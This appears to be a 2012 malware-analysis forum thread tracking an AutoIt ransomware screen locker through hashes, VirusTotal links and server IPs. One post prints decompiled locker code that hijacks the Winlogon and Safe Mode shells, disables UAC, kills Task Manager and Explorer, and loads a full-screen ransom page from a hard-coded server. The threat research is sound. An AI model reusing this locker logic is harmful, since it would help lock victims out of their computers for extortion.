AutoIt/LockScreen

Forum for analysis and discussion about malware.

AutoIt/LockScreen

Postby thisisu » Mon Jun 04, 2012 8:06 am

Celas
MD5: a7768f4973ad7cf8217212a4d12dbae0
https://www.virustotal.com/file/c8ea293 ... /analysis/

Image
You do not have the required permissions to view the files attached to this post.
User avatar
thisisu
 
Posts: 362
Joined: Sun Feb 26, 2012 8:57 am
Reputation point: 65

Re: Trojan Ransom / FakePoliceAlert

Postby Kafeine » Mon Jun 04, 2012 8:22 am

thisisu wrote:Celas

Here on botnets.fr :
https://www.botnets.fr/index.php/Ransom.II
Kafeine
 
Posts: 105
Joined: Thu Jul 28, 2011 1:19 pm
Reputation point: 74

Re: Trojan Ransom / FakePoliceAlert

Postby thisisu » Mon Jun 11, 2012 12:32 am

"Celas" - Ransom.II
MD5: 941d0697b844414be106b7a397d31fd6
https://www.virustotal.com/file/8801cce ... /analysis/
You do not have the required permissions to view the files attached to this post.
User avatar
thisisu
 
Posts: 362
Joined: Sun Feb 26, 2012 8:57 am
Reputation point: 65

Re: Trojan Ransom / FakePoliceAlert

Postby tachion » Mon Jun 11, 2012 5:16 pm

Next Ransom II - Celas :)
You do not have the required permissions to view the files attached to this post.
User avatar
tachion
 
Posts: 32
Joined: Sat Dec 24, 2011 10:03 am
Reputation point: 14

Re: Trojan Ransom / FakePoliceAlert

Postby Win32:Virut » Tue Jun 12, 2012 1:41 pm

You do not have the required permissions to view the files attached to this post.
Win32:Virut
 
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm
Reputation point: 82

Trojan:AutoIt/LockScreen

Postby Win32:Virut » Sun Jul 08, 2012 7:52 pm

Ransom.II

MD5: F74E910C368717E9ACEF3A1B9A1A9F03

Screenshots: https://www.botnets.fr/index.php/Ransom.II
You do not have the required permissions to view the files attached to this post.
Win32:Virut
 
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm
Reputation point: 82

Re: Trojan Ransom / FakePoliceAlert

Postby Win32:Virut » Mon Jul 09, 2012 1:50 pm

Trojan:Win32/Ransom.II

MD5: 5D18E789AFED967531372ACCBB7152A2
You do not have the required permissions to view the files attached to this post.
Win32:Virut
 
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm
Reputation point: 82

Re: Trojan Ransom / FakePoliceAlert

Postby Win32:Virut » Fri Aug 17, 2012 1:36 pm

Ransom.II

MD5: 82B192B07B32D0E77B1F2B21F17283E6

https://www.virustotal.com/file/edd206f ... /analysis/
You do not have the required permissions to view the files attached to this post.
Win32:Virut
 
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm
Reputation point: 82

Re: Trojan Ransom / FakePoliceAlert

Postby thisisu » Tue Nov 13, 2012 1:02 am

Win32:Virut wrote:Ransom.II

MD5: F74E910C368717E9ACEF3A1B9A1A9F03

Screenshots: https://www.botnets.fr/index.php/Ransom.II


Parts of decompiled Autoit script. / Highlights?
Code: Select all
00049AAC -> CompiledPathName: C:\DOKUME~1\Admin\LOKALE~1\Temp\aut3E.tmp

$UNDERGROUND = "brasilia"
$SWISS = "germany"

ProcessClose("iexplore.exe")
ProcessClose("firefox.exe")
$URL = "95.163.104.88/spielberg/start.php"
If @OSVersion = "WIN_7" Or @OSVersion = "WIN_VISTA" Then
   If @OSArch = "X64" Then
      RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
   Else
      RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
   EndIf
EndIf
$ASHELL = RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell")
If $ASHELL <> @ScriptFullPath Then
   If @OSVersion <> "WIN_7" Or @OSVersion = "WIN_VISTA" Then
      RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
   EndIf
   RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell", "REG_SZ", @ScriptFullPath)
   RegWrite("HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
   RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
   RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
$SHELL = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
If $SHELL <> @ScriptFullPath Then
   FileCreateShortcut(@ScriptFullPath, @StartupDir & "\" & @ScriptName & ".lnk")
EndIf
$OIE = ObjCreate("Shell.Explorer.2")
$HGUI = GUICreate("", @DesktopWidth, @DesktopHeight, 0, 0, $WS_POPUP + $WS_EX_TOOLWINDOW, $WS_EX_LAYERED + $WS_EX_TOPMOST + $WS_EX_TOOLWINDOW)
$GUIACTIVEX = GUICtrlCreateObj($OIE, 0, 0, @DesktopWidth, @DesktopHeight)
GUISetBkColor(1, $HGUI)
GUISetState()
$OIE.navigate($URL)
_WinAPI_SetLayeredWindowAttributes($HGUI, 1, 255, 3)
Local $TIMER, $DIFF
$TIMER = TimerInit()
While 1
   $DIFF = TimerDiff($TIMER)
   If $DIFF > 150 Then
      If ProcessExists("taskmgr.exe") Then
         ProcessClose("taskmgr.exe")
      EndIf
      If ProcessExists("explorer.exe") Then
         Run(@ComSpec & " /c " & "taskkill /f /im explorer.exe", "", @SW_HIDE)
      EndIf
      $DIFF = 0
      $TIMER = TimerInit()
   EndIf
   WinSetOnTop($HGUI, "", 1)
   WinActivate($HGUI)
WEnd


Full decompile in attachment.

You can add this IP: 95.163.104.88 to your page Kafeine :)
You do not have the required permissions to view the files attached to this post.
User avatar
thisisu
 
Posts: 362
Joined: Sun Feb 26, 2012 8:57 am
Reputation point: 65

Re: Trojan Ransom / FakePoliceAlert

Postby thisisu » Tue Nov 13, 2012 1:35 am

Win32:Virut wrote:Ransom.II

MD5: 82B192B07B32D0E77B1F2B21F17283E6

https://www.virustotal.com/file/edd206f ... /analysis/


Lots of interesting code in this one IMO. I just picked a small amount so it doesn't lag the thread.
Code: Select all
00049AAC -> CompiledPathName: C:\DOKUME~1\Admin\LOKALE~1\Temp\aut7B.tmp

If FileExists(@AppDataDir & "1.exe") Then
   $HAFTBEFEHLAAT = "haftbefehlaat"
   $URL = "95.163.104.87/aff14/start.php"


Full decompile in attach
You do not have the required permissions to view the files attached to this post.
User avatar
thisisu
 
Posts: 362
Joined: Sun Feb 26, 2012 8:57 am
Reputation point: 65

Next

Return to Malware

Who is online

Users browsing this forum: No registered users and 6 guests